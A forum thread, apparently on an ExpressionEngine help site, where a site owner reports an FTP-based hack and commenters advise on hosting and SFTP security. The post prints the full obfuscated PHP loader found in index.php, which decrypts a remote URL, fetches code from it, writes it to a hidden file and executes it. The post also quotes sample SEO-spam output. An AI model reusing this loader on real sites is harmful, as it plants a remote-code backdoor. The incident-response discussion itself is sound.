# My EE Site was Hacked

Tags: ee2, ftp

I'm posting this in case any advice helps others who've suffered a similar hack. AFAIK the hack involves compromised FTP access only. index.php of EE v2.10.2 was modified and a couple of new subdirectories containing generated files were created within a web-accessible directory.  No database or system directory access.  All code was removed and I reset hosting account, FTP and database passwords following discovery.

- Any comments on further best practice in EE following an FTP hack like this?
- Suggestions on what the code does - some kind of automated review
  submission?

The generated files contained mostly Arabic and look like:

```
    <"forexarabica|<div itemscope="" itemtype="http://schema.org/Product">
    <span itemprop="name">خيار ثنائي مراجعة الروبوت يوتيوب rating</span>
    <div itemprop="aggregateRating" itemscope="" itemtype="http://schema.org/AggregateRating">
    <span itemprop="ratingValue">5-5</span> stars based on
    <span itemprop="reviewCount">126</span> reviews
    </div>
    </div>
[lots of Arabic in paragraphs plus some random URLs]
```

The code found at the top of index.php was:

```
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5'; $pass = "Zgc5c4MXrLskZVkZ9Y1BPrCRP1WUNbhY3iKMG+/NuQE=";
if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
        $data = file_get_contents($url);
        return $data;
    }
}
else {
    function get_data_ya($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}
function wp_cd($fd, $fa="")
{
   $fe = "wp_frmfunct";
   $len = strlen($fd);
   $ff = '';
   $n = $len>100 ? 8 : 2;
   while( strlen($ff)<$len )
   {
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
   }
   return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
    if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    foreach ($subdirs as $subdira) {
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    }
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?>
```

Comment: Use SFTP and SSH keys.

Comment: Have you had your hosting co. investigate? If it's shared it may be a server wide hack and not particular to your install.

Comment: Hosting co said that my local machine must have been compromised.  I asked them: "How can you be so sure it's malware on my machine?"

"Because if you try to login to your control panel a few times unsuccessfully you will be locked out. For an FTP account you can try as many times as you want but it's rather hard to just brute force a password. All of your passwords are encrypted on our side and we have not had any reports of hacking attempts on our servers. If our servers are ever compromised you will be informed and all of your credentials will be changed for your security."

Comment: This account doesn't offer SFTP.

Comment: Sorry - yes it does but had just been using standard FTP.

Comment: Not a great answer for you, but I would switch hosts to start. Also, unless you've been sending ftp user/pw around via email etc... I would still be looking at a server security fail that lead to the hack.

Comment: Do their logs show that the file was edited by your FTP account from your IP? Seems far fetched. A more likely scenario is software on the same server that has a security flaw that allowed a remote user access to the file system in other users' accounts, which let the intruder write to your files. This type of attack used to be very common via Wordpress on shared hosting, for example, and had nothing to do with FTP accounts being compromised. That said, I'm with Jim. SFTP and require SSH keys. Some hosts like Nexcess also require IP addresses to be whitelisted to use FTP.

Comment: I had a site with an identical hack yesterday too. It seemed to be providing search engine robots with "polluted" content.

Comment: Comments appreciated.

Answer (score 2):

Yes my suspicions (and prior experience) have been that this hack originated on the server.  My machine (Mac OSX) is clean and I look after passwords carefully. The function *wp_cd* in the code above suggests a WordPress-targetted attack, not EE.

For the host to say "we have not had any reports of hacking attempts on our servers" and not to treat my report as such is irresponsible. I'll be moving host at the next opportunity and making SFTP / SSH my default connection method.  Andrew Weaver and I have established that the hosting company suffering these attacks is the same one, that we both use. Hosts can only stand to lose trust and hence customers if they don't admit liability when they should.

After all the reset of passwords and virus scan of my machine early yesterday, I checked the server files again today.  The same hack had been applied again late last night...

Comment: Did you manage to secure the site and if so how did you do it? Thanks

Comment: As the site was hosted on a shared server and we had no control of the overall server security we had no option but to move hosts.